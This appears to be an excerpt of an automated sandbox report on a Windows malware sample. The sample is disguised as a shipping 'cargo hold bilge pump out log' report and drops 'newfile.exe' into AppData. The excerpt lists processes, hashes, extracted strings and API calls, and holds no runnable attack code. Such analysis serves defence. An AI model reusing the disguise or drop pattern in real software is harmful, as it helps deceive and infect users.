Show Windows behavior

Target ID:	19
Start time:	15:05:18
Start date:	29/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	15:05:26
Start date:	29/03/2024
Path:	C:\Users\user\AppData\Roaming\newfile\newfile.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
Imagebase:	0x3d0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:05:26
Start date:	29/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exePID: 7336, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	17.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.6%
Total number of Nodes:	216
Total number of Limit Nodes:	12

Executed Functions

Function 02527898 Relevance: 9.7, Strings: 7, Instructions: 908COMMON

Download Yara Rule

Strings

,bq, xrefs: 02528180
(o^q, xrefs: 02528108
(o^q, xrefs: 02527DC2
(o^q, xrefs: 025280FA
,bq, xrefs: 02528172
Hbq, xrefs: 02527C8E
(o^q, xrefs: 02528425

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-1608600535
Opcode ID: ecc07ddd2ecb1ee78f50b4fe0ad10c96ed3586e854990576d5c8fb527aaafdac
Instruction ID: 9671573aa7759a1edd646309cde9e0336a7d3a51c8c1bb55d23c10daca279874
Opcode Fuzzy Hash: ecc07ddd2ecb1ee78f50b4fe0ad10c96ed3586e854990576d5c8fb527aaafdac
Instruction Fuzzy Hash: 9F728F31A002299FDB14CFA9C998AAEBBF6FF89304F148559E405AB3D1DB30DD45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 07341C4F Relevance: 5.6, Instructions: 5637
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d87ce460055dc07d707c757e611905b70b75256f7101f6ace45a4a11b826f47b
Instruction ID: acdc4265324138e40652c17c45dbc8746dcea355a432c955cd34236a38324cbf
Opcode Fuzzy Hash: d87ce460055dc07d707c757e611905b70b75256f7101f6ace45a4a11b826f47b
Instruction Fuzzy Hash: C8C30974A11218CFDB58EF38D98969DBBF2AB89304F0049E9D448A7354DF356E89CF42

Uniqueness

Uniqueness Score: -1.00%

Function 07341C68 Relevance: 5.6, Instructions: 5633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6bfa4eb31e56f37a1db94f1c8e564f9dd75bff48c395c175e386d1837f959c8
Instruction ID: 98e8a9a87e3676794d005466fca46bdc538a6a129d836b586f9a2706e676a319
Opcode Fuzzy Hash: c6bfa4eb31e56f37a1db94f1c8e564f9dd75bff48c395c175e386d1837f959c8
Instruction Fuzzy Hash: 6FC30974A11218CFDB58EF38D98969DBBF2AB89304F0049E9D448A7354DF356E89CF42

Uniqueness

Uniqueness Score: -1.00%

Function 06DE28C8 Relevance: 5.2, Instructions: 5170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2046761193.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de0000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ceab61500753fc4ebd0cac6bc3a1e1f3348111bd1eac9a7e908cd011bb08a82
Instruction ID: f8bca8996fbff46be07af50b93a06bbff2519fa4c7ed6b8f7d39f6114af2fca9
Opcode Fuzzy Hash: 4ceab61500753fc4ebd0cac6bc3a1e1f3348111bd1eac9a7e908cd011bb08a82
Instruction Fuzzy Hash: 06B30C70A11618CFCB14FF78E98965DBBF2BB88204F4089E9D489A7354DE315E89DF81

Uniqueness

Uniqueness Score: -1.00%

Function 025252F8 Relevance: 2.8, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 02525327
$^q, xrefs: 0252530E

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: 4dad4db9226f83bd0bafff179aa0b255dcc448c62f77484d8bdaf8d9a95abb55
Instruction ID: c1ffacf85bb706cfb1d84ae2fba51994471a4a4ce6eceb1008458ece4af34880
Opcode Fuzzy Hash: 4dad4db9226f83bd0bafff179aa0b255dcc448c62f77484d8bdaf8d9a95abb55
Instruction Fuzzy Hash: AB818070B042289FDB1CEBB8885467E7BB7BFC8700B448929D406E72D8EE34DC068795

Uniqueness

Uniqueness Score: -1.00%

Function 059D10AB Relevance: 1.3, Instructions: 1264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046377430.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59d0000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 803ac18eb0e7b24da8ab9b545334ca11b2a0356b0e7725a701bc9631c4db2a2d
Instruction ID: 150f697a0de7096c3c3fe930362c1d81b671f74410905c2196ee79fd99212344
Opcode Fuzzy Hash: 803ac18eb0e7b24da8ab9b545334ca11b2a0356b0e7725a701bc9631c4db2a2d
Instruction Fuzzy Hash: 4FB25A30A1122ACFCB14FF79D9896ADBBB1FB88704F4045A9E449A7350DE349E85CF52

Uniqueness

Uniqueness Score: -1.00%

Function 05C72A78 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 987e5a182091c3a23b7d94b6e5ddbca4e267dd65addca7ebd67effa12b7c6f0e
Instruction ID: d882c29a1a598452e14be7e0332b9deff993cb792cdf16e1e7f8b9d1d3966359
Opcode Fuzzy Hash: 987e5a182091c3a23b7d94b6e5ddbca4e267dd65addca7ebd67effa12b7c6f0e
Instruction Fuzzy Hash: 3E527D34A003598FCB14DF28C944B99B7F2FF89314F2586A9D5586F3A1DB71A986CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0252EE18 Relevance: 90.7, Strings: 72, Instructions: 688
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 0252EEBD
4'^q, xrefs: 0252F872
4'^q, xrefs: 0252EE31
4'^q, xrefs: 0252F26E
4'^q, xrefs: 0252F34A
4'^q, xrefs: 0252F179
4'^q, xrefs: 0252F922
4'^q, xrefs: 0252EE54
4'^q, xrefs: 0252F4AA
4'^q, xrefs: 0252F712
4'^q, xrefs: 0252F133
4'^q, xrefs: 0252F7C2
4'^q, xrefs: 0252F228
4'^q, xrefs: 0252F0CA
4'^q, xrefs: 0252EEE0
4'^q, xrefs: 0252F662
4'^q, xrefs: 0252F19C
4'^q, xrefs: 0252F31E
4'^q, xrefs: 0252F3FA
4'^q, xrefs: 0252F502
4'^q, xrefs: 0252F110
4'^q, xrefs: 0252F24B
4'^q, xrefs: 0252F3CE
4'^q, xrefs: 0252EF26
4'^q, xrefs: 0252EF8F
4'^q, xrefs: 0252F586
4'^q, xrefs: 0252EFB2
4'^q, xrefs: 0252F156
4'^q, xrefs: 0252F846
4'^q, xrefs: 0252EF03
4'^q, xrefs: 0252F2C6
4'^q, xrefs: 0252EE77
4'^q, xrefs: 0252F1BF
4'^q, xrefs: 0252EE9A
4'^q, xrefs: 0252EF49
4'^q, xrefs: 0252F8F6
4'^q, xrefs: 0252F426
4'^q, xrefs: 0252F061
4'^q, xrefs: 0252F81A
4'^q, xrefs: 0252F0ED
4'^q, xrefs: 0252F01B
4'^q, xrefs: 0252EFD5
4'^q, xrefs: 0252F0A7
4'^q, xrefs: 0252F03E
4'^q, xrefs: 0252F7EE
4'^q, xrefs: 0252F084
4'^q, xrefs: 0252F60A
4'^q, xrefs: 0252F94E
4'^q, xrefs: 0252F452
4'^q, xrefs: 0252F76A
4'^q, xrefs: 0252EFF8
4'^q, xrefs: 0252F796
4'^q, xrefs: 0252F8CA
4'^q, xrefs: 0252F52E
4'^q, xrefs: 0252F1E2
4'^q, xrefs: 0252F3A2
4'^q, xrefs: 0252F47E
4'^q, xrefs: 0252F4D6
4'^q, xrefs: 0252F5B2
4'^q, xrefs: 0252F55A
4'^q, xrefs: 0252F6BA
4'^q, xrefs: 0252F5DE
4'^q, xrefs: 0252F376
4'^q, xrefs: 0252F68E
4'^q, xrefs: 0252F73E
4'^q, xrefs: 0252F6E6
4'^q, xrefs: 0252F29A
4'^q, xrefs: 0252F205
4'^q, xrefs: 0252F2F2
4'^q, xrefs: 0252EF6C
4'^q, xrefs: 0252F636
4'^q, xrefs: 0252F89E

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-1605395142
Opcode ID: ffaada2324c35461d17bb5293a2cc0fdcd4aeddadf893e0b6e593df60271295e
Instruction ID: e6c361790908b3714b9321938928ba4692c497d5a07dd4c53d7a92fef55d075f
Opcode Fuzzy Hash: ffaada2324c35461d17bb5293a2cc0fdcd4aeddadf893e0b6e593df60271295e
Instruction Fuzzy Hash: B1723C34E4125A9FCF08EF64E95469DBBB1FB44704F1089A9D049AB369DF306E8ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 0252C348 Relevance: 8.8, Strings: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 0252C420
Te^q, xrefs: 0252C392
Te^q, xrefs: 0252C362
Te^q, xrefs: 0252C3B1
Te^q, xrefs: 0252C377
Te^q, xrefs: 0252C383
Te^q, xrefs: 0252C3A5

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: PH^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q
API String ID: 0-3527804896
Opcode ID: c974d28c95902e43061ccd2837f2dbb07b2e2dd5b0b13afa8122db66c7e37fc8
Instruction ID: bda09cdb86b0b14e2dd50913e88396c287739bf6e796d8c4d68f920cab4e02f8
Opcode Fuzzy Hash: c974d28c95902e43061ccd2837f2dbb07b2e2dd5b0b13afa8122db66c7e37fc8
Instruction Fuzzy Hash: 9021F830F502289BDB189B68C9587BE7AE67B88741F10491AD441AB3C5CE714C4987D5

Uniqueness

Uniqueness Score: -1.00%

Function 04C24480 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 04C2450E
GetCurrentThread.KERNEL32 ref: 04C2454B
GetCurrentProcess.KERNEL32 ref: 04C24588
GetCurrentThreadId.KERNEL32 ref: 04C245E1

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 56ffef0918af126df8cf34a8dde11b0330070af901eabf1954fae6a2d35aa501
Instruction ID: 4cd038b5b592c17d3ea5f22cf7688ef1d9bbb5e5004c3d40e1c9584dd03389c7
Opcode Fuzzy Hash: 56ffef0918af126df8cf34a8dde11b0330070af901eabf1954fae6a2d35aa501
Instruction Fuzzy Hash: 625158B09012099FDB14CFA9D548BDEBBF2FF89314F208469E059A7360D774A944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 04C24490 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 04C2450E
GetCurrentThread.KERNEL32 ref: 04C2454B
GetCurrentProcess.KERNEL32 ref: 04C24588
GetCurrentThreadId.KERNEL32 ref: 04C245E1

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 771ed9d0471c2cf583e4bfee18247783d60071f443415493650dcff31b987665
Instruction ID: 5278e7bcb13df80793fc12fb39efda1c4ce02950e6c5ad6a7c748c16cb50ecae
Opcode Fuzzy Hash: 771ed9d0471c2cf583e4bfee18247783d60071f443415493650dcff31b987665
Instruction Fuzzy Hash: 5B5157B0901309DFDB14CFA9D548B9EBBF1FB89314F208469E059A7360D774A984CF66

Uniqueness

Uniqueness Score: -1.00%

Function 02529AB0 Relevance: 5.8, Strings: 4, Instructions: 812
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0252A5F7
W, xrefs: 0252A795
(o^q, xrefs: 0252A7B1
$^q, xrefs: 0252A5D4

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: (o^q$W$$^q$$^q
API String ID: 0-3605992493
Opcode ID: 5c3ed57cfe01803e69214d363d6c039bc3e326947a6bea804b79341d82137a3c
Instruction ID: cf72678980ee0f1dfa53995d53790fa1955473677633ffdfbb47afa8a6795459
Opcode Fuzzy Hash: 5c3ed57cfe01803e69214d363d6c039bc3e326947a6bea804b79341d82137a3c
Instruction Fuzzy Hash: 14729475A00218CFEB149BA4C950BAEBF76FF88300F1081A9D50A6B3A5DF359D89DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0252ACB8 Relevance: 3.9, Strings: 3, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0252ADC4
Hbq, xrefs: 0252AE64
$^q, xrefs: 0252ADB8

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: Hbq$$^q$$^q
API String ID: 0-1611274095
Opcode ID: 846859dc9fd516d5b3787ab3c64aeff4115f614550496a22fd40bbe1591d48c2
Instruction ID: 73a8fb88484686e2a81fb514b88f149029b0691e0cbffe3f4792414bcdace179
Opcode Fuzzy Hash: 846859dc9fd516d5b3787ab3c64aeff4115f614550496a22fd40bbe1591d48c2
Instruction Fuzzy Hash: 1B51B3313002244FCB196F79945863EBAABFFC6641318446AD447CB3D1DF28CC0AC7A9

Uniqueness

Uniqueness Score: -1.00%

Function 02527370 Relevance: 2.7, Strings: 2, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,bq, xrefs: 02527446
,bq, xrefs: 02527450

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: e31327924c84d2dc6797516667792e6d8ad2b11f3b609eb8b7852d6cf732d18a
Instruction ID: b149fa8b15560af17cf6c2bef8d15e7b5df1df4c4f41008ffcafec455f0076c8
Opcode Fuzzy Hash: e31327924c84d2dc6797516667792e6d8ad2b11f3b609eb8b7852d6cf732d18a
Instruction Fuzzy Hash: 66818B30B00525CFCB14DF69C884A6AFBBABF8E218B148569D405DB3E5DB31EC49CB95

Uniqueness

Uniqueness Score: -1.00%

Function 02526C80 Relevance: 2.7, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

Hbq, xrefs: 02526E84
Hbq, xrefs: 02526E51

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 4cae228c983c295469803dd94c0728282109a93f0436a0abace6abb1ee226ea9
Instruction ID: 68d453a33da35786fd2186ab83bd4570d81996fb527107475bc32b37983fac9f
Opcode Fuzzy Hash: 4cae228c983c295469803dd94c0728282109a93f0436a0abace6abb1ee226ea9
Instruction Fuzzy Hash: D0817C317002189FDF04AF68D854B6EBFBAFB88701F148419E9069B2D4CB34DD45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 05C7B46F Relevance: 2.7, Strings: 2, Instructions: 197COMMON

Download Yara Rule

Strings

PH^q, xrefs: 05C7B54E
PH^q, xrefs: 05C7B6BC

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 165a45fc35e5188ac7db0ec222a22c4cd8dd20e41a98da07019c85559ba3fd3e
Instruction ID: 0dddc8f66d12fdde2f32bc7aa5b809357e8ad43171c8f7119901d4667c83ffae
Opcode Fuzzy Hash: 165a45fc35e5188ac7db0ec222a22c4cd8dd20e41a98da07019c85559ba3fd3e
Instruction Fuzzy Hash: A881D134A40208CFCB54DF68C998EA9BBF2FF48715F1549A8E506AB7A1DB31ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02525B40 Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

XX^q, xrefs: 02525BD3
XX^q, xrefs: 02525BC7

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: XX^q$XX^q
API String ID: 0-1102689228
Opcode ID: d46d20b90d889b7a8cb47a2f5aad94215d8ed1220841cb3cf9afa43b0441cbac
Instruction ID: 6c300b28980474b680c611ff28383a07e44a396a9532dbeedbc2f996fba06cf3
Opcode Fuzzy Hash: d46d20b90d889b7a8cb47a2f5aad94215d8ed1220841cb3cf9afa43b0441cbac
Instruction Fuzzy Hash: 17510571A002199FD7189B39C95872ABBE6FBC9300F60C969E016CB3D5EB319D48C791

Uniqueness

Uniqueness Score: -1.00%

Function 05C728F8 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

Hbq, xrefs: 05C740E0
(bq, xrefs: 05C73FC2

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 1fa679d815697c0eec778f20e017fce673a9c95cb3aa7fc4bd27692fccdc0523
Instruction ID: f2d7d315cc29088e3fdb93a3f581aa0f519ef81c2e76a88b461ced826ec7399c
Opcode Fuzzy Hash: 1fa679d815697c0eec778f20e017fce673a9c95cb3aa7fc4bd27692fccdc0523
Instruction Fuzzy Hash: 935146316041549FCB18EF28D4846AD7FE6FB89340F1889AAD44A9BB91CF35AC42C792

Uniqueness

Uniqueness Score: -1.00%

Function 0252B368 Relevance: 2.6, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

Hbq, xrefs: 0252B44F
Hbq, xrefs: 0252B482

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 4f339cf4d8defe8bac34f4d24f169deb9017b20f3092f9359fd4bf175f323b2b
Instruction ID: 4c58a18936c894272db1e73fc837a97783b0fc4ab892c0447fdac54f58595a86
Opcode Fuzzy Hash: 4f339cf4d8defe8bac34f4d24f169deb9017b20f3092f9359fd4bf175f323b2b
Instruction Fuzzy Hash: DE41D5316042699FDB119F64C880B6E7BF7FF9A308F058969E805973C0DB34D815CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 073409FF Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

TJcq, xrefs: 07340AD6
Te^q, xrefs: 07340AC1

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 21a4c58509f2b1e10658e948b7b392c4217d7ef4fbfb2bc5cd52a6fe22b6a1a5
Instruction ID: 2dab6c9a84a3647cb8d5a2f9efaf93ad4499e79bfa8dfb79f6f7e6b599df4c22
Opcode Fuzzy Hash: 21a4c58509f2b1e10658e948b7b392c4217d7ef4fbfb2bc5cd52a6fe22b6a1a5
Instruction Fuzzy Hash: 8331D5357145158FC708BBB9E49862EB7F6EBC9614F004899E489CB391CE389C0A8796

Uniqueness

Uniqueness Score: -1.00%

Function 07340A18 Relevance: 2.6, Strings: 2, Instructions: 91COMMON

Download Yara Rule

Strings

TJcq, xrefs: 07340AD6
Te^q, xrefs: 07340AC1

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 20b2cfaefeee6d5b354c534d0e669e2499e1fef339fa6b4e7e9ced9c29c52ceb
Instruction ID: 2e58feecc12c9747bfc991e5d3945c5d85b47546d63d9f185e58d96f74a015e2
Opcode Fuzzy Hash: 20b2cfaefeee6d5b354c534d0e669e2499e1fef339fa6b4e7e9ced9c29c52ceb
Instruction Fuzzy Hash: DE21A2357105158FC708BBBDE498A2EB7EABBC8614F4048A9E449CB390DE34DC0A8796

Uniqueness

Uniqueness Score: -1.00%

Function 02528F70 Relevance: 1.7, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02528FA9

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 87f8df794fb8cb1a32df5f46bc5fd8e46ded59790b166986b66477d10de9ffed
Instruction ID: bca8ffcd140cf58db815c3bbe7d2c6afade36c052766f95a0f79faab14ff5fd2
Opcode Fuzzy Hash: 87f8df794fb8cb1a32df5f46bc5fd8e46ded59790b166986b66477d10de9ffed
Instruction Fuzzy Hash: C1125A31700225DFCB15CF68C588AAABBF6BF8A304F258955E4059B3D5D730ED85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0734EC20 Relevance: 1.7, Strings: 1, Instructions: 455COMMON

Download Yara Rule

Strings

@, xrefs: 0734F0D4

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6585c64cb311f4eff7c42a9e45b36b1357837f86f234546ac0179b0d804e567f
Instruction ID: b5ecb7e545fde19dccf1ad04916ca5bc77297fe8f6f77ecab5f56ebfe618a154
Opcode Fuzzy Hash: 6585c64cb311f4eff7c42a9e45b36b1357837f86f234546ac0179b0d804e567f
Instruction Fuzzy Hash: B0E1D470B04205CFD709BF79E49966DBBF1FF89204F4548A9E485D7361DE38A80ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 04C26C90 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C28C02

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7a8f893b6a66d5b37d2d5fc319a0394a2df2b95505dd0aa26adfa403df6f2647
Instruction ID: 1dfa19a8331f61bd4404442bee087230eeb6bf0571ab79784fec681618e953bb
